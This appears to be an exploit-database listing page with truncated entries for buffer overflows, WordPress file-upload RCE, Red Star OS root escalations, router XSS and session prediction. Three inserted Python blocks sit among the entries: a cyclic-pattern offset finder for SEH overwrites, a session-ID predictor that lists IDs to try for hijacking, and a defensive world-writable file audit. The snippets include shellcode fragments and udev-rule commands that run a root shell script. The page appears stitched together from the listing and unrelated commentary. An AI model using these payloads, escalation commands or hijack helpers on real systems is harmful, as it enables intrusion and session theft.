WordPress Plugin Cforms 14.7 - Remote Code Execution
WordPress Plugin Cforms 14.7 - Remote Code Execution Exploit Title: Remote Code Execution via Unauthorised File upload in Cforms 14.7 Date: 2015-01-19 Exploit Author: Zakhar Vendor Homepage: https://wordpress.org/plugins/cforms2/ Software Link: https://downloads.wordpress.org/plugin/cforms2.zip...
Samsung SmartViewer BackupToAvi 3.0 - Remote Code Execution
Samsung SmartViewer BackupToAvi 3.0 - Remote Code Execution var payloadlength = 15000; var arg1=1; var arg2=1; var arg3=1; //blank strings var junk = ""; var buf1 = ""; var buf2 = ""; //offset to SEH is 156, initial analysis using metasploit cyclic pattern for i=0; i...
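Several entries on this page (SmartViewer, Congstar, T-Mobile Internet Manager, Palringo, the Corelan zip-parser PoCs) locate the SEH or return-address overwrite with a Metasploit cyclic pattern. The following is an added example, not code from any of those exploits or from Metasploit: it regenerates the Aa0Aa1... pattern, recovers the offset from the 4 bytes seen in the debugger (either as ASCII or as the little-endian register value), and splits a payload into the usual junk/nSEH/SEH/tail layout. The 156-byte offset used in the usage note is illustrative, not a claim about any product listed here.

```python
import itertools
import string
import struct


def pattern_create(length):
    """Build a Metasploit-style cyclic pattern (Aa0Aa1Aa2...) of `length` bytes.

    Every 4-byte window is unique for lengths up to 20280, so the 4 bytes that
    land in EIP or in the SEH record identify one offset unambiguously.
    """
    chunks = []
    total = 0
    for upper, lower, digit in itertools.product(
        string.ascii_uppercase, string.ascii_lowercase, string.digits
    ):
        chunks.append(upper + lower + digit)
        total += 3
        if total >= length:
            break
    return "".join(chunks)[:length]


def pattern_offset(pattern, value):
    """Return the offset of `value` in `pattern`, or -1 if absent.

    `value` may be the ASCII bytes read from a debugger dump ("Af2A"), raw
    bytes, or the 32-bit register value as an int (0x41326641). An int is
    unpacked little-endian, which is how an x86 register shows the bytes that
    overwrote it.
    """
    if isinstance(value, int):
        value = struct.pack("<I", value).decode("ascii")
    elif isinstance(value, bytes):
        value = value.decode("ascii")
    return pattern.find(value)


def seh_layout(pattern, seh_value, total_len):
    """Given the value found in the SEH handler slot, return the byte counts of
    the classic layout: junk before nSEH, nSEH (4), SEH (4), remaining tail.
    Returns None when the value is not in the pattern or sits too early."""
    seh_off = pattern_offset(pattern, seh_value)
    if seh_off < 4:
        return None
    nseh_off = seh_off - 4
    return {"junk": nseh_off, "nseh": 4, "seh": 4, "tail": total_len - seh_off - 4}


if __name__ == "__main__":
    # Constructed walk-through: send pattern_create(15000), read 0x41326641 from
    # the SEH handler slot, and recover where in the buffer that value came from.
    p = pattern_create(15000)
    print(pattern_offset(p, 0x41326641))
    print(seh_layout(p, 0x41326641, 15000))
```

Feed the function the value exactly as the debugger prints the register; the little-endian unpack is what turns 0x41326641 back into "Af2A". If the offset comes back as -1, the bytes usually passed through a mangling filter (upper-casing, bad characters) before reaching the stack, which is the situation the KenWards Zipper entry below describes.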
Congstar Internet Manager - Local Buffer Overflow (SEH)
Congstar Internet Manager - Local Buffer Overflow SEH #!/usr/bin/python Exploit Title: Congstar Internet-Manager SEH Buffer Overflow Software for usb Wireless: Congstar Prepaid Internet-Stick MF100 Homepage: www.congstar.de/downloads/prepaid-internet-stick/ Software...
Microsoft Windows 8.1 (x86x64) - User Profile Service Privilege Escalation (MS15-003)
Microsoft Windows 8.1 x86x64 - User Profile Service Privilege Escalation MS15-003 Source: https://code.google.com/p/google-security-research/issues/detail?id=123 Platform: Windows 8.1 Update 32/64 bit No other OS tested When a user logs into a computer the User Profile Service is used to create...
Lorex LH300 Series - ActiveX Buffer Overflow (PoC)
Lorex LH300 Series - ActiveX Buffer Overflow PoC Disclosure: 09/01/2014 / Last updated: 18/01/2015 Hi, I have discovered a buffer overflow vulnerability that allows remote code execution in an ActiveX control bundled by a manufacturer of video surveillance systems. The company is Lorex...
T-Mobile Internet Manager - Local Buffer Overflow (SEH)
T-Mobile Internet Manager - Local Buffer Overflow SEH #!/usr/bin/python # coding: utf-8 Exploit Title: T-Mobile Internet Manager SEH Buffer Overflow Version: Internet Manager Software for Windows TMOPCV1.0.5B06 Software for usb Wireless: T-Mobile web'n'walk Stick Fusion...
WordPress Plugin Pie Register 2.0.13 - Privilege Escalation
WordPress Plugin Pie Register 2.0.13 - Privilege Escalation Exploit Title: Pie Register 2.0.13 Privilege escalation Date: 16-10-2014 Software Link: https://wordpress.org/plugins/pie-register/ Exploit Author: Kacper Szurek Contact: http://twitter.com/KacperSzurek Website: http://security.szurek.pl...
Sim Editor 6.6 - Local Stack Buffer Overflow
Sim Editor 6.6 - Local Stack Buffer Overflow include include include #define SIZE 65536 /* Title: Sim Editor v6.6 Stack Based Buffer Overflow Version: 6.6 Tested on: Windows XP sp2 en, Windows 8 64-bit Date: 16-01-2015 Author: Osanda Malith Jayathissa E-Mail: osanda (at) unseen.is Website:...
ManageEngine Desktop Central - Create Administrator
ManageEngine Desktop Central - Create Administrator Administrator account creation in ManageEngine Desktop Central / Desktop Central MSP Discovered by Pedro Ribeiro [email protected], Agile Information Security =================================================================================...
Dell-iDRAC-IPMI-1.5
Dell iDRAC IPMI v1.5 Implementation contains a flaw that is triggered because session IDs are assigned incrementally rather than randomly, and the overall pool of IDs is limited. This may allow a remote attacker to trivially predict session IDs, hijack a session, and inject arbitrary commands. from time import sleep...
Ansible Tower 2.0.2 - Multiple Vulnerabilities
Ansible Tower 2.0.2 - Multiple Vulnerabilities SEC Consult Vulnerability Lab Security Advisory ======================================================================= title: Privilege Escalation & XSS & Missing Authentication product: Ansible Tower vulnerable version: <=2.0.5 impact: high homepage...
Apple Mac OSX 10.10 - BlueTooth BlueToothHCIChangeLocalName Crash (PoC)
Apple Mac OSX 10.10 - BlueTooth BlueToothHCIChangeLocalName Crash PoC /* crash-issue2.c: Written for Mac OS X Yosemite 10.10 by @rpaleari and @joystick. Triggers a panic by overwriting a stack canary. gcc -Wall -o crash-issue2{,.c} -framework IOKit */ include include include include include include struc...
Apple Mac OSX 10.10 - BlueTooth DispatchHCIWriteStoredLinkKey Crash (PoC)
Apple Mac OSX 10.10 - BlueTooth DispatchHCIWriteStoredLinkKey Crash PoC /* lpe-issue1.c Written for Mac OS X Yosemite 10.10.1 by @joystick and @rpaleari. Exploits IOBluetoothHCIUserClient::DispatchHCIWriteStoredLinkKey gcc -Wall -o lpe-issue1{,.c} -framework IOKit */ include include include include...
Dell iDRAC IPMI 1.5 - Insufficient Session ID Randomness
Dell iDRAC IPMI 1.5 - Insufficient Session ID Randomness """ For testing purposes only. c Yong Chuan, Koh 2014 """ from time import sleep from socket import from struct import from random import import sys, os, argparse HOST = None PORT = 623 bufsize = 1024 recv = "" create socket UDPsock =...
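Both iDRAC entries above describe the same weakness: session IDs handed out incrementally from a small pool, so an attacker who opens a session of their own learns roughly what every other live session ID is. The block below is an added example, not part of Yong Chuan Koh's script or of any IPMI implementation, and it deliberately stays off the wire: it takes a list of session IDs already observed (the two lists are constructed sample data) and reports whether the generator is sequential, what the next ID will be, and which neighbouring IDs are the likely candidates for hijacking. The 0.9 stride threshold and 32-bit ID width are assumptions chosen for the example.

```python
from collections import Counter

# Constructed sample data: IDs an attacker collected by opening five sessions in a
# row against a sequential generator, and four IDs from a generator that looks random.
OBSERVED_SEQUENTIAL = [0x0A10, 0x0A11, 0x0A12, 0x0A13, 0x0A14]
OBSERVED_RANDOM = [0x9F3C1A22, 0x17E4B0C5, 0xC2A19E01, 0x5B7D3344]


def session_id_deltas(ids):
    """Differences between consecutive observed session IDs."""
    return [b - a for a, b in zip(ids, ids[1:])]


def analyze_session_ids(ids, id_bits=32, stride_threshold=0.9):
    """Summarise how predictable a run of observed session IDs is.

    A generator is treated as sequential when one non-zero stride explains at
    least `stride_threshold` of the steps. The guess count is the work an
    attacker faces to name the next ID: one try for a fixed stride, the whole
    2**id_bits space when the IDs show no structure.
    """
    if len(ids) < 3:
        raise ValueError("need at least three observed IDs")
    deltas = session_id_deltas(ids)
    stride, count = Counter(deltas).most_common(1)[0]
    ratio = count / len(deltas)
    sequential = ratio >= stride_threshold and stride != 0
    mask = (1 << id_bits) - 1
    return {
        "stride": stride,
        "stride_ratio": ratio,
        "sequential": sequential,
        "guesses_for_next": 1 if sequential else 1 << id_bits,
        "predicted_next": ((ids[-1] + stride) & mask) if sequential else None,
    }


def live_session_candidates(last_id, stride, count, id_bits=32):
    """IDs most likely to belong to other users' sessions opened just before
    `last_id`: walk backwards `count` strides, wrapping at the ID width. This
    is the list a hijack attempt would try first."""
    mask = (1 << id_bits) - 1
    return [(last_id - k * stride) & mask for k in range(1, count + 1)]


if __name__ == "__main__":
    for label, ids in (("sequential", OBSERVED_SEQUENTIAL), ("random", OBSERVED_RANDOM)):
        print(label, analyze_session_ids(ids))
    print(live_session_candidates(OBSERVED_SEQUENTIAL[-1], 1, 3))
```

The same analysis applies to any bearer-style identifier (web session cookies, API session tokens): if a handful of samples yields a stable stride, the ID is predictable regardless of how long it is. The check only needs IDs the tester legitimately obtained for their own sessions.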
Apple Mac OSX 10.10 - BlueTooth TransferACLPacketToHW Crash (PoC)
Apple Mac OSX 10.10 - BlueTooth TransferACLPacketToHW Crash PoC /* crash-issue3.c: Written for Mac OS X Yosemite 10.10 by @rpaleari and @joystick. Exploits a missing check in IOBluetoothHCIController::TransferACLPacketToHW to trigger a panic. gcc -Wall -o crash-issue3{,.c} -framework IOKit */ include...
Apple Mac OSX 10.10 - BlueTooth DispatchHCICreateConnection Crash (PoC)
Apple Mac OSX 10.10 - BlueTooth DispatchHCICreateConnection Crash PoC /* crash-issue1.c: Written for Mac OS X Yosemite 10.10 by @rpaleari and @joystick. Exploits a missing check in IOBluetoothHCIUserClient::DispatchHCICreateConnection causing a panic. gcc -Wall -o crash-issue1{,.c} -framework IOKit ...
Foxit MobilePDF 4.4.0 iOS - Multiple Vulnerabilities
Foxit MobilePDF 4.4.0 iOS - Multiple Vulnerabilities Document Title: =============== Foxit MobilePDF v4.4.0 iOS - Multiple Web Vulnerabilities References Source: ==================== http://www.vulnerability-lab.com/getcontent.php?id=1400 Release Date: ============= 2015-01-12 Vulnerability...
Gecko CMS 2.3 - Multiple Vulnerabilities
Gecko CMS 2.3 - Multiple Vulnerabilities Gecko CMS 2.3 Multiple Vulnerabilities Vendor: JAKWEB Product web page: http://www.cmsgecko.com Affected version: 2.3 and 2.2 Summary: Gecko CMS is the way to go, forget complicated, bloated and slow content management systems, Gecko CMS has been built to...
RedStar-3.0-Desktop-Escalation
Alternative steps: https://pbs.twimg.com/media/B68inqBIQAA5sK6.png Proof: https://github.com/HackerFantastic/Public/blob/master/exploits/redstar3.0-localroot.png cp /etc/udev/rules.d/85-hplj10xx.rules /tmp/udevhp.bak echo 'RUN+="/bin/bash /tmp/r00t.sh"' > /etc/udev/rules.d/85-hplj10xx.rules cat...
Exploit-Tutorial-1
This is a module that will help you learn the basics of exploit development; the focus of this one is a stack-based buffer overflow and the platform used is GNU/Linux. Basic Buffer Overflow for Linux - Part of the Exploit Pack Tutorials The following exploit code has been written in Python and...
RedStar 3.0 Desktop - Software Manager swmng.app Local Privilege Escalation
RedStar 3.0 Desktop - Software Manager swmng.app Local Privilege Escalation The root user is disabled on Red Star, and it doesn't look like there is a way to enable it. Unfortunately, they left a big security hole: the Software Manager swmng.app, which runs as root through sudo and will install a...
RedStar 3.0 Desktop - Enable sudo Privilege Escalation
RedStar 3.0 Desktop - Enable sudo Privilege Escalation #!/bin/bash -e Alternative steps: https://pbs.twimg.com/media/B68inqBIQAA5sK6.png Proof: https://github.com/HackerFantastic/Public/blob/master/exploits/redstar3.0-localroot.png cp /etc/udev/rules.d/85-hplj10xx.rules /tmp/udevhp.bak echo...
RedStar 2.0 Desktop - World-writeable rc.sysinit Local Privilege Escalation
RedStar 2.0 Desktop - World-writeable rc.sysinit Local Privilege Escalation Red Star 2.0 desktop ships with a world-writeable "/etc/rc.d/rc.sysinit" which can be abused to execute commands on boot. An example exploitation of this vulnerability is shown here...
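The Red Star entries above share one root cause: a file that root executes at boot or on a device event (rc.sysinit, a udev rules file) is writable by an unprivileged user. The audit below is an added example, not taken from any of the listed exploits: it walks a set of startup locations, reports every regular file with the other-write bit set, and ships with a throwaway fixture so it can be exercised without touching a real system. The directory list in DEFAULT_STARTUP_DIRS is an assumption about a SysV-style layout like Red Star's; extend it for systemd units or cron directories as needed. Symlinks are reported by their own mode only; the target is not followed.

```python
import os
import shutil
import stat
import tempfile

# Assumed SysV-style boot locations that root executes; extend for the target system.
DEFAULT_STARTUP_DIRS = [
    "/etc/rc.d",
    "/etc/init.d",
    "/etc/rc.local",
    "/etc/udev/rules.d",
]


def is_world_writable(path):
    """True when the file's own mode grants write to 'other'. Symlinks are
    judged by their own (lstat) mode, so a link is never reported here."""
    st = os.lstat(path)
    if stat.S_ISLNK(st.st_mode):
        return False
    return bool(st.st_mode & stat.S_IWOTH)


def find_world_writable(paths):
    """Return a sorted list of regular files under `paths` (files or
    directories) that any local user may modify."""
    findings = []
    for root in paths:
        if not os.path.lexists(root):
            continue
        if os.path.isfile(root):
            if is_world_writable(root):
                findings.append(root)
            continue
        for dirpath, _dirnames, filenames in os.walk(root):
            for name in filenames:
                full = os.path.join(dirpath, name)
                if is_world_writable(full):
                    findings.append(full)
    return sorted(findings)


def demo_fixture():
    """Build a constructed rc.d tree with one correctly-permissioned script and
    one world-writable script, run the audit, and return relative paths."""
    base = tempfile.mkdtemp(prefix="rc-audit-")
    try:
        rcdir = os.path.join(base, "rc.d")
        os.mkdir(rcdir)
        safe = os.path.join(rcdir, "rc.local")
        bad = os.path.join(rcdir, "rc.sysinit")
        for p in (safe, bad):
            with open(p, "w") as fh:
                fh.write("#!/bin/sh\n")
        os.chmod(safe, 0o755)
        os.chmod(bad, 0o777)  # the misconfiguration the Red Star 2.0 entry describes
        return [os.path.relpath(p, base) for p in find_world_writable([rcdir])]
    finally:
        shutil.rmtree(base, ignore_errors=True)


if __name__ == "__main__":
    print("fixture:", demo_fixture())
    print("this host:", find_world_writable(DEFAULT_STARTUP_DIRS))
```

Run it as an unprivileged user; anything it lists is a root-at-boot write primitive of exactly the kind the rc.sysinit and udev-rule entries use, and the fix is `chmod o-w` plus a check on who owns the file.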
D-Link DSL-2730B Modem - Lancfg2get.cgi Persistent Cross-Site Scripting
D-Link DSL-2730B Modem - Lancfg2get.cgi Persistent Cross-Site Scripting Exploit Title: D-Link DSL-2730B Modem lancfg2get.cgi Exploit XSS Injection Stored Date: 11-01-2015 Exploit Author: Mauricio Correa Vendor Homepage: www.dlink.com Hardware version: C1 Version: GE 1.01 Tested on: Windows 8 and...
D-Link DSL-2730B Modem - Cross-Site Scripting Injection Stored DnsProxy.cmd
D-Link DSL-2730B Modem - Cross-Site Scripting Injection Stored DnsProxy.cmd Exploit Title: D-Link DSL-2730B Modem dnsProxy.cmd Exploit XSS Injection Stored Date: 11-01-2015 Exploit Author: Mauricio Correa Vendor Homepage: www.dlink.com Hardware version: C1 Version: GE 1.01 Tested on: Windows 8 an...
D-Link DSL-2730B Modem - Cross-Site Scripting Injection Stored Wlsecrefresh.wl Wlsecurity.wl
D-Link DSL-2730B Modem - Cross-Site Scripting Injection Stored Wlsecrefresh.wl Wlsecurity.wl Exploit Title: D-Link DSL-2730B Modem wlsecrefresh.wl & wlsecurity.wl Exploit XSS Injection Stored Date: 11-01-2015 Exploit Author: Mauricio Correa Vendor Homepage: www.dlink.com Hardware version: C1...
Apple Mac OSX 10.9.x - sysmond XPC Privilege Escalation
Apple Mac OSX 10.9.x - sysmond XPC Privilege Escalation /* Source: https://code.google.com/p/google-security-research/issues/detail?id=121 */ /* tested on OS X 10.9.5 - uses some hard-coded offsets which will have to be fixed-up for other versions! this poc uses liblorgnette to resolve some private...
Palringo 2.8.1 - Local Stack Buffer Overflow
Palringo 2.8.1 - Local Stack Buffer Overflow #!/usr/bin/perl Exploit Title: palringo stack buffer overflow Date: 10 January 2015 Vulnerability discovered by: Mr.ALmfL9 Vendor Homepage: http://www.palringo.com/ Software Link: http://www.palringo.com/ar/sa/download/?get=winpc Version: 2.8.1 Tested...
vBulletin MicroCART 1.1.4 - Arbitrary Files Deletion SQL Injection Cross-Site Scripting
vBulletin MicroCART 1.1.4 - Arbitrary Files Deletion SQL Injection Cross-Site Scripting Exploit Title: vBulletin MicroCART 1.1.4 - Arbitrary Files Deletion, SQL Injection & XSS Date: January 8, 2015 Exploit Author: Technidev https://technidev.com Vendor Homepage: https://vbulletin.com Software...
Windows-Kerberos-MS14-068
Microsoft Windows Server contains a flaw related to the checksum in the Kerberos Key Distribution Center KDC component. The issue is triggered when the component fails to properly validate signatures. This may allow an authenticated remote attacker to use a forged Kerberos ticket signature to gai...
WordPress Plugin Shopping Cart 3.0.4 - Unrestricted Arbitrary File Upload
WordPress Plugin Shopping Cart 3.0.4 - Unrestricted Arbitrary File Upload...
Ntpdc 4.2.6p3 - Local Buffer Overflow
Ntpdc 4.2.6p3 - Local Buffer Overflow Source: https://hatriot.github.io/blog/2015/01/06/ntpdc-exploit/ from os import system, environ from struct import pack import sys ntpdc 4.2.6p3 bof @dronesec tested on x86 Ubuntu 12.04.5 LTS IMAGEBASE = 0x80000000 LDINITIALOFFSET = 8900 LDTAILOFFSET = 1400...
Mini-stream-Ripper-3.0.1.1-(.m3u)
Mini-stream Ripper 3.0.1.1 .m3u Buffer Overflow Code Execution Software Link: http://www.mini-stream.net/downloads/Mini-streamRipper.exe Author: l3D Site: http://xraysecurity.blogspot.com nops1='\x90'*0x2a80 system("calc") - Metasploit.com...
QuickZip-4.x-(.zip)
Exploit Title : QuickZip 4.x .zip 0day Local Universal Buffer Overflow PoC Exploit Date : 9/3/2010 Author : corelanc0d3r mrme Bug found by : corelanc0d3r http://corelan.be:8800/ Software Link : http://www.quickzip.org/downloads.html Version : 4.60 header1 =...
Stud_PE-2.6.05
Exploit Title: StudPE v2.6.05 Stack Overflow PoC exploit Date: 03/28/2010 Author: zha0 Software Link: http://www.cgsoftlabs.ro/studpe.html Version: StudPE v2.6.05 peexe= "\x4D\x5A\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xFF\xFF\x00\x00"...
KenWards-Zipper-1.400
This exploit takes advantage of the fact that too many characters get mangled; as a result I was able to get a shell in a more straightforward way. Very interesting exercise. Mrme and tecR0c figured out this trick, of course, but I was given the honor to share it. Zip file format based on:...
Kenward-Zipper-1.4
Exploit Title : Kenward zipper v1.4 0day Stack Buffer Overflow PoC exploit Date : 23/3/2010 Bug found by : corelanc0d3r http://www.corelan.be:8800/ Author : mrme http://net-ninja.net/ Software Link : http://www.trans4mind.com/personaldevelopment/zipper/ Version : 1.4 ldfheader =...
Crimson-Editor-r3.70-SEH
Exploit Title : Crimson Editor r3.70 SEH Overwrite Vulnerability PoC exploit Date : 21/03/2010 Author : mrme Bug found by : sharpe Version : 3.70 Release header =...
ZippHo-3.0.6-(.zip)
ZippHo 3.0.6 .zip 0day stack buffer overflow PoC exploit Author: mrme - http://net-ninja.net/ http://twitter.com/StevenSeeley Download: http://www.brothersoft.com/zippho-71295.html Platform: Windows XP sp3 En local file header lfheader =...
Adobe-Reader-PDF-LibTiff
Title: Adobe PDF LibTiff Integer Overflow Code Execution. Product: Adobe Acrobat Reader Version: 8.3.0, 9.3.0 CVE: CVE-2010-0188 import sys import base64 import struct import zlib import StringIO SHELLCODEOFFSET=0x555 TIFFOFSET=0x2038 windows/exec - 227 bytes http://www.metasploit.com Encoder:...
Avast!-4.7-aavmker4.sys
avast! 4.7 aavmker4.sys privilege escalation http://www.trapkit.de/advisories/TKADV2008-002.txt CVE-2008-1625 from ctypes import * import time, struct, sys, thread, os kernel32 = windll.kernel32 Psapi = windll.Psapi def findSysBase(drv): print "[+] Retrieving %s base address..." % drv ARRAYSIZE = 1024...
IDEAL-Administration-2010-10.2
IDEAL Administration 2010 v10.2 Local Buffer Overflow Exploit Found By: DrIDE Usage: Migrate Open Migration Project Bind Shell Download: www.pointdev.com sc = "\x89\xe2\xdb\xcc\xd9\x72\xf4\x5f\x57\x59\x49\x49\x49\x49\x49" "\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"...
IDEAL-Migration-2009-4.5.1
IDEAL Migration 2009 v4.5.1 Local Buffer Overflow Exploit Found By: DrIDE Usage: Right Click First Element in tree Open Migration Project Bind Shell Download: www.pointdev.com sc = "\x89\xe2\xdb\xcc\xd9\x72\xf4\x5f\x57\x59\x49\x49\x49\x49\x49"...
TweakFS-1.0-(FSX-Edition)
Bug found by : TecR0c Software Link : http://tweakfs.com/ Version : 1.0 OS : Windows Tested on : XP SP3 En VirtualBox Type of vuln : Direct RET / SEH ldfheader = "\x50\x4B\x03\x04\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00" "\xe4\x0f" "\x00\x00\x00"...
Archive-Searcher-(.zip)
Software : Archive Searcher 2.1 Author : Lincoln OS : Windows Tested on : XP SP3 En VirtualBox Zip Headers header1= "\x50\x4b\x03\x04\x14\x00\x00\x00" + "\x00\x00\xb7\xac\xce\x34\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\xe4\x0f\x00\x00\x00" header2= "\x50\x4b\x01\x02\x14\x00\x14\x00"...
Linux-Kernel-2.6.34-rc3
The kernel allows processes to access the internal .reiserfspriv directory at the top of a reiserfs filesystem which is used to store xattrs. Permissions are not enforced in that tree, so unprivileged users can view and potentially modify the xattrs on arbitrary files. import os, sys SHELL = 'int...
Castripper-2.50.70-(.pls)
Castripper 2.50.70 .pls stack buffer overflow w/ DEP bypass exploit Author: mrme - https://net-ninja.net - mrme AT corelan.be Download: http://www.mini-stream.net/castripper/ def banner(): print "|------------------------------------------------------------------|" print "| |" print "| / / / / |"...
VUPlayer-2.49---(.m3u)
VUPlayer 2.49 .M3u Universal buffer overflow exploit w/ DEP bypass Author: mrme Download: http://vuplayer.com/ Tested on Wind0ws XP SP3 /noexecute=alwayson sc = "\x89\xe1\xd9\xee\xd9\x71\xf4\x58\x50\x59\x49\x49\x49\x49" "\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56"...
Audio-Converter-8.1
Author : Sud0 Bug found by : chap0 Software Link : http://download.cnet.com/Audio-Converter/3000-21404-10045287.html Version : 8.1 OS : Windows import socket shellcode running calc.exe alpha2 encoded basereg edx...
Mediacoder-0.7.3.4672
Title: Mediacoder v0.7.3.4672 SEH Exploit Author: Stoke from devilc0de crew http://hack2web.altervista.org http://devilc0de.altervista.org shell = "\x89\xe2\xdb\xcb\xd9\x72\xf4\x5b\x53\x59\x49\x49\x49\x49\x49" "\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"...